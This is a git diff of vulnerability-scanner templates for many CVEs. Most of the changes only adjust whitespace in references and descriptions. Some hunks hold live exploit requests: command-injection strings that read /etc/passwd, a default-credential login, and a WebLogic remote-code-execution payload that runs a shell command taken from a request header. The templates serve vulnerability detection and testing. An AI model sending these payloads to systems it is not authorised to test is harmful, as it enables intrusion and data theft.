critical tags: cve,cve2019,nexus,rce reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-7238 - - https://github.com/jas502n/CVE-2019-7238 + - https://nvd.nist.gov/vuln/detail/CVE-2019-7238 + - https://github.com/jas502n/CVE-2019-7238 requests: - raw: diff --git a/cves/2019/CVE-2019-7256.yaml b/cves/2019/CVE-2019-7256.yaml index 93e7ed7adb..660516cef2 100644 --- a/cves/2019/CVE-2019-7256.yaml +++ b/cves/2019/CVE-2019-7256.yaml @@ -11,7 +11,7 @@ info: tags: cve,cve2019,emerge,rce requests: - - raw: # Default Port + - raw: # Default Port - | GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1 Host: {{Hostname}} diff --git a/cves/2019/CVE-2019-9733.yaml b/cves/2019/CVE-2019-9733.yaml index f4623231a4..51972077b8 100644 --- a/cves/2019/CVE-2019-9733.yaml +++ b/cves/2019/CVE-2019-9733.yaml @@ -13,22 +13,22 @@ info: requests: - raw: - | - POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1 - Host: {{Hostname}} - Content-Length: 60 - Accept: application/json, text/plain, */* - X-Requested-With: artUI - serial: 58 - X-Forwarded-For: 127.0.0.1 - Request-Agent: artifactoryUI - User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 - Content-Type: application/json - Origin: http://{{Hostname}} - Referer: http://{{Hostname}}/artifactory/webapp/ - Accept-Language: en-US,en;q=0.9 - Connection: close + POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1 + Host: {{Hostname}} + Content-Length: 60 + Accept: application/json, text/plain, */* + X-Requested-With: artUI + serial: 58 + X-Forwarded-For: 127.0.0.1 + Request-Agent: artifactoryUI + User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 + Content-Type: application/json + Origin: http://{{Hostname}} + Referer: http://{{Hostname}}/artifactory/webapp/ + Accept-Language: en-US,en;q=0.9 + Connection: close - {"user":"access-admin","password":"password","type":"login"} + {"user":"access-admin","password":"password","type":"login"} matchers-condition: and matchers: diff --git a/cves/2020/CVE-2019-9618.yaml b/cves/2020/CVE-2019-9618.yaml index b857a53bc9..47d0f46a02 100644 --- a/cves/2020/CVE-2019-9618.yaml +++ b/cves/2020/CVE-2019-9618.yaml @@ -5,8 +5,8 @@ info: author: 0x_Akoko severity: critical reference: - - https://www.exploit-db.com/exploits/46537 - - https://nvd.nist.gov/vuln/detail/CVE-2019-9618 + - https://www.exploit-db.com/exploits/46537 + - https://nvd.nist.gov/vuln/detail/CVE-2019-9618 tags: cve,cve2019,wordpress,wp-plugin,lfi requests: diff --git a/cves/2020/CVE-2020-11034.yaml b/cves/2020/CVE-2020-11034.yaml index 5ab3e4810e..126476f33d 100644 --- a/cves/2020/CVE-2020-11034.yaml +++ b/cves/2020/CVE-2020-11034.yaml @@ -6,9 +6,9 @@ info: severity: low description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection based which is based on a regexp. This is fixed in version 9.4.6. reference: - - https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg - - https://github.com/glpi-project/glpi/archive/9.4.6.zip - - https://nvd.nist.gov/vuln/detail/CVE-2020-11034 + - https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg + - https://github.com/glpi-project/glpi/archive/9.4.6.zip + - https://nvd.nist.gov/vuln/detail/CVE-2020-11034 tags: cve,cve2020,redirect diff --git a/cves/2020/CVE-2020-11978.yaml b/cves/2020/CVE-2020-11978.yaml index fac9efaabe..e39d531569 100644 --- a/cves/2020/CVE-2020-11978.yaml +++ b/cves/2020/CVE-2020-11978.yaml @@ -5,9 +5,9 @@ info: severity: high description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable. reference: - - https://github.com/pberba/CVE-2020-11978 - - https://nvd.nist.gov/vuln/detail/CVE-2020-11978 - - https://twitter.com/wugeej/status/1400336603604668418 + - https://github.com/pberba/CVE-2020-11978 + - https://nvd.nist.gov/vuln/detail/CVE-2020-11978 + - https://twitter.com/wugeej/status/1400336603604668418 tags: cve,cve2020,apache,airflow,rce requests: diff --git a/cves/2020/CVE-2020-13167.yaml b/cves/2020/CVE-2020-13167.yaml index e6ba5ee430..c21bdb58bb 100644 --- a/cves/2020/CVE-2020-13167.yaml +++ b/cves/2020/CVE-2020-13167.yaml @@ -10,16 +10,16 @@ info: - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/ - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says - # This template exploits a Python code injection in the Netsweeper - # WebAdmin component's unixlogin.php script, for versions 6.4.4 and - # prior, to execute code as the root user. +# This template exploits a Python code injection in the Netsweeper +# WebAdmin component's unixlogin.php script, for versions 6.4.4 and +# prior, to execute code as the root user. - # Authentication is bypassed by sending a random whitelisted Referer - # header in each request. +# Authentication is bypassed by sending a random whitelisted Referer +# header in each request. - # Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs. - # Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has - # been confirmed exploitable. +# Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs. +# Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has +# been confirmed exploitable. requests: - method: GET diff --git a/cves/2020/CVE-2020-13700.yaml b/cves/2020/CVE-2020-13700.yaml index 645363a779..844a1401f5 100644 --- a/cves/2020/CVE-2020-13700.yaml +++ b/cves/2020/CVE-2020-13700.yaml @@ -6,9 +6,9 @@ info: severity: high reference: https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5 description: | - An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress. - It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a - wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values. + An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress. + It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a + wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values. tags: cve,cve2020,wordpress requests: diff --git a/cves/2020/CVE-2020-13937.yaml b/cves/2020/CVE-2020-13937.yaml index 46ac04bffe..be27c3f3a9 100644 --- a/cves/2020/CVE-2020-13937.yaml +++ b/cves/2020/CVE-2020-13937.yaml @@ -5,12 +5,12 @@ info: author: pikpikcu severity: medium description: | - Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, - 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, - 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, - 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed - Kylin's configuration information without any authentication, - so it is dangerous because some confidential information entries will be disclosed to everyone. + Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, + 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, + 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, + 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed + Kylin's configuration information without any authentication, + so it is dangerous because some confidential information entries will be disclosed to everyone. reference: - https://kylin.apache.org/docs/release_notes.html - https://s.tencent.com/research/bsafe/1156.html diff --git a/cves/2020/CVE-2020-14883.yaml b/cves/2020/CVE-2020-14883.yaml index dbb81a9dd2..84fa26ca9a 100644 --- a/cves/2020/CVE-2020-14883.yaml +++ b/cves/2020/CVE-2020-14883.yaml @@ -17,7 +17,7 @@ requests: Test-Header: cat /etc/passwd body: | - test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("Test-Header");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();') + test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("Test-Header");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();') matchers-condition: and matchers: diff --git a/cves/2020/CVE-2020-15148.yaml b/cves/2020/CVE-2020-15148.yaml index 67847810d6..247fac361d 100644 --- a/cves/2020/CVE-2020-15148.yaml +++ b/cves/2020/CVE-2020-15148.yaml @@ -5,8 +5,8 @@ info: author: pikpikcu severity: high reference: - - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943 - - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md + - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943 + - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md tags: cve,cve2020,rce,yii requests: diff --git a/cves/2020/CVE-2020-15227.yaml b/cves/2020/CVE-2020-15227.yaml index 4b1e65c8a7..474fa19f0a 100644 --- a/cves/2020/CVE-2020-15227.yaml +++ b/cves/2020/CVE-2020-15227.yaml @@ -6,10 +6,10 @@ info: severity: high description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-15227 - - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94 - - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E# - - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md + - https://nvd.nist.gov/vuln/detail/CVE-2020-15227 + - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94 + - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E# + - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md tags: cve,cve2020,nette,rce requests: diff --git a/cves/2020/CVE-2020-21224.yaml b/cves/2020/CVE-2020-21224.yaml index 1e84564e2d..e85004b3b3 100644 --- a/cves/2020/CVE-2020-21224.yaml +++ b/cves/2020/CVE-2020-21224.yaml @@ -17,7 +17,7 @@ requests: Referer: "{{Hostname}}/module/login/login.html" body: | - op=login&username=;`cat /etc/passwd`&password= + op=login&username=;`cat /etc/passwd`&password= matchers-condition: and matchers: diff --git a/cves/2020/CVE-2020-27866.yaml b/cves/2020/CVE-2020-27866.yaml index 5ef1db5c75..9222bdaf5d 100644 --- a/cves/2020/CVE-2020-27866.yaml +++ b/cves/2020/CVE-2020-27866.yaml @@ -7,9 +7,9 @@ info: description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability. tags: cve,cve2020,netgear,auth-bypass reference: - - https://wzt.ac.cn/2021/01/13/AC2400_vuln/ - - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/ - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866 + - https://wzt.ac.cn/2021/01/13/AC2400_vuln/ + - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866 requests: - raw: diff --git a/cves/2020/CVE-2020-27986.yaml b/cves/2020/CVE-2020-27986.yaml index fa8541d74b..dcb73a8bf5 100644 --- a/cves/2020/CVE-2020-27986.yaml +++ b/cves/2020/CVE-2020-27986.yaml @@ -5,9 +5,9 @@ info: author: pikpikcu severity: medium description: | - SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, - SVN, and GitLab credentials via the api/settings/values URI. - NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it." + SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, + SVN, and GitLab credentials via the api/settings/values URI. + NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it." reference: https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/ tags: cve,cve2020,sonarqube diff --git a/cves/2020/CVE-2020-36112.yaml b/cves/2020/CVE-2020-36112.yaml index 522d6d82c3..f5a620db25 100644 --- a/cves/2020/CVE-2020-36112.yaml +++ b/cves/2020/CVE-2020-36112.yaml @@ -5,8 +5,8 @@ info: author: geeknik description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database. reference: - - https://www.exploit-db.com/exploits/49314 - - https://www.tenable.com/cve/CVE-2020-36112 + - https://www.exploit-db.com/exploits/49314 + - https://www.tenable.com/cve/CVE-2020-36112 severity: critical tags: cve,cve2020,sqli,cse diff --git a/cves/2020/CVE-2020-36289.yaml b/cves/2020/CVE-2020-36289.yaml index 22359eda5d..9b1cb65ed5 100644 --- a/cves/2020/CVE-2020-36289.yaml +++ b/cves/2020/CVE-2020-36289.yaml @@ -7,8 +7,8 @@ info: description: Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the QueryComponentRendererValue!Default.jspa endpoint. The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1. tags: cve,cve2020,jira,atlassian reference: - - https://twitter.com/ptswarm/status/1402644004781633540 - - https://nvd.nist.gov/vuln/detail/CVE-2020-36289 + - https://twitter.com/ptswarm/status/1402644004781633540 + - https://nvd.nist.gov/vuln/detail/CVE-2020-36289 requests: - method: GET diff --git a/cves/2020/CVE-2020-5307.yaml b/cves/2020/CVE-2020-5307.yaml index 175c159ba9..81f8a02ae5 100644 --- a/cves/2020/CVE-2020-5307.yaml +++ b/cves/2020/CVE-2020-5307.yaml @@ -5,7 +5,7 @@ info: author: gy741 description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php. reference: - - https://cinzinga.com/CVE-2020-5307-5308/ + - https://cinzinga.com/CVE-2020-5307-5308/ severity: critical tags: cve,cve2020,sqli diff --git a/cves/2020/CVE-2020-7209.yaml b/cves/2020/CVE-2020-7209.yaml index 2d8af1dd8c..a4df4fd3d9 100644 --- a/cves/2020/CVE-2020-7209.yaml +++ b/cves/2020/CVE-2020-7209.yaml @@ -13,8 +13,8 @@ info: - https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 - https://www.hpe.com/us/en/home.html # vendor homepage - # This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution. - # The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability. +# This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution. +# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability. requests: - method: GET diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml index 0a0e1ce779..4db2ab02e8 100644 --- a/cves/2020/CVE-2020-7961.yaml +++ b/cves/2020/CVE-2020-7961.yaml @@ -7,8 +7,8 @@ info: tags: cve,cve2020,rce,liferay description: Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS). reference: - - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html - - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271 + - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html + - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271 requests: - payloads: diff --git a/cves/2020/CVE-2020-9490.yaml b/cves/2020/CVE-2020-9490.yaml index 29298339ca..cd341cf256 100644 --- a/cves/2020/CVE-2020-9490.yaml +++ b/cves/2020/CVE-2020-9490.yaml @@ -7,10 +7,10 @@ info: author: philippedelteil tags: cve,cve2020,apache,dos reference: - - https://httpd.apache.org/security/vulnerabilities_24.html - - https://bugs.chromium.org/p/project-zero/issues/detail?id=2030 - - https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=443369 - - https://nvd.nist.gov/vuln/detail/CVE-2020-9490 + - https://httpd.apache.org/security/vulnerabilities_24.html + - https://bugs.chromium.org/p/project-zero/issues/detail?id=2030 + - https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=443369 + - https://nvd.nist.gov/vuln/detail/CVE-2020-9490 requests: - method: GET diff --git a/cves/2021/CVE-2021-20090.yaml b/cves/2021/CVE-2021-20090.yaml index 9f70517315..9c9c57c372 100644 --- a/cves/2021/CVE-2021-20090.yaml +++ b/cves/2021/CVE-2021-20090.yaml @@ -7,9 +7,9 @@ info: description: | A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-20090 - - https://www.tenable.com/security/research/tra-2021-13 - - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20090 + - https://www.tenable.com/security/research/tra-2021-13 + - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 tags: cve,cve2021,lfi,buffalo,firmware,iot requests: diff --git a/cves/2021/CVE-2021-20091.yaml b/cves/2021/CVE-2021-20091.yaml index 55bd86f160..6ac0d4f526 100644 --- a/cves/2021/CVE-2021-20091.yaml +++ b/cves/2021/CVE-2021-20091.yaml @@ -7,9 +7,9 @@ info: description: | The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-20091 - - https://www.tenable.com/security/research/tra-2021-13 - - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20091 + - https://www.tenable.com/security/research/tra-2021-13 + - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 tags: cve,cve2021,buffalo,firmware,iot requests: diff --git a/cves/2021/CVE-2021-20092.yaml b/cves/2021/CVE-2021-20092.yaml index 306d94127d..6b175dab6d 100644 --- a/cves/2021/CVE-2021-20092.yaml +++ b/cves/2021/CVE-2021-20092.yaml @@ -7,9 +7,9 @@ info: description: | The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-20091 - - https://www.tenable.com/security/research/tra-2021-13 - - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20091 + - https://www.tenable.com/security/research/tra-2021-13 + - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 tags: cve,cve2021,buffalo,firmware,iot requests: diff --git a/cves/2021/CVE-2021-21307.yaml b/cves/2021/CVE-2021-21307.yaml index 216727adc8..cdd020bddc 100644 --- a/cves/2021/CVE-2021-21307.yaml +++ b/cves/2021/CVE-2021-21307.yaml @@ -6,9 +6,9 @@ info: severity: critical description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development. In Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 there is an unauthenticated remote code exploit. This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, one can block access to the Lucee Administrator. reference: - - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r - - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md - - https://nvd.nist.gov/vuln/detail/CVE-2021-21307 + - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r + - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md + - https://nvd.nist.gov/vuln/detail/CVE-2021-21307 tags: cve,cve2021,rce,lucee,adobe requests: diff --git a/cves/2021/CVE-2021-22214.yaml b/cves/2021/CVE-2021-22214.yaml index ffaac3c2bc..51523e26ab 100644 --- a/cves/2021/CVE-2021-22214.yaml +++ b/cves/2021/CVE-2021-22214.yaml @@ -6,9 +6,9 @@ info: severity: medium description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-22214 - - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html - - https://docs.gitlab.com/ee/api/lint.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-22214 + - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html + - https://docs.gitlab.com/ee/api/lint.html tags: cve,cve2021,gitlab,ssrf,oob requests: diff --git a/cves/2021/CVE-2021-24176.yaml b/cves/2021/CVE-2021-24176.yaml index 8b18bc6ce9..54bede3572 100644 --- a/cves/2021/CVE-2021-24176.yaml +++ b/cves/2021/CVE-2021-24176.yaml @@ -6,8 +6,8 @@ info: severity: medium description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard. reference: - - https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585 - - https://wordpress.org/plugins/jh-404-logger/ + - https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585 + - https://wordpress.org/plugins/jh-404-logger/ tags: cve,cve2021,wordpress,wp-plugin,xss requests: diff --git a/cves/2021/CVE-2021-24237.yaml b/cves/2021/CVE-2021-24237.yaml index 6a8ba89710..365eb7c2d9 100644 --- a/cves/2021/CVE-2021-24237.yaml +++ b/cves/2021/CVE-2021-24237.yaml @@ -7,8 +7,8 @@ info: severity: medium tags: cve,cve2021,realteo,xss,wordpress reference: - - https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e - - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt + - https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e + - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt requests: - method: GET diff --git a/cves/2021/CVE-2021-24285.yaml b/cves/2021/CVE-2021-24285.yaml index 9d7f344e7d..8f67d63102 100644 --- a/cves/2021/CVE-2021-24285.yaml +++ b/cves/2021/CVE-2021-24285.yaml @@ -7,9 +7,9 @@ info: description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitise, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue. tags: cve,cve2021,wordpress,wp-plugin,sqli reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-24285 - - https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/ - - https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24285 + - https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/ + - https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162 requests: - raw: diff --git a/cves/2021/CVE-2021-24316.yaml b/cves/2021/CVE-2021-24316.yaml index 036761fd15..f4b9b78af4 100644 --- a/cves/2021/CVE-2021-24316.yaml +++ b/cves/2021/CVE-2021-24316.yaml @@ -7,8 +7,8 @@ info: severity: medium tags: cve,cve2021,mediumish,xss,wordpress reference: - - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e - - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt + - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e + - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt requests: - method: GET diff --git a/cves/2021/CVE-2021-24495.yaml b/cves/2021/CVE-2021-24495.yaml index 4fae911bf5..1c13d872ec 100644 --- a/cves/2021/CVE-2021-24495.yaml +++ b/cves/2021/CVE-2021-24495.yaml @@ -6,8 +6,8 @@ info: severity: medium tags: cve,cve2021,wp-plugin,wordpress,xss reference: - - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/ - - https://wordpress.org/plugins/marmoset-viewer/#developers + - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/ + - https://wordpress.org/plugins/marmoset-viewer/#developers requests: - method: GET diff --git a/cves/2021/CVE-2021-25646.yaml b/cves/2021/CVE-2021-25646.yaml index a1128591fe..23c3e6d3dc 100644 --- a/cves/2021/CVE-2021-25646.yaml +++ b/cves/2021/CVE-2021-25646.yaml @@ -6,8 +6,8 @@ info: severity: critical reference: https://paper.seebug.org/1476/ description: | - Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data. - Apache Druid lacks authorization and authentication by default. 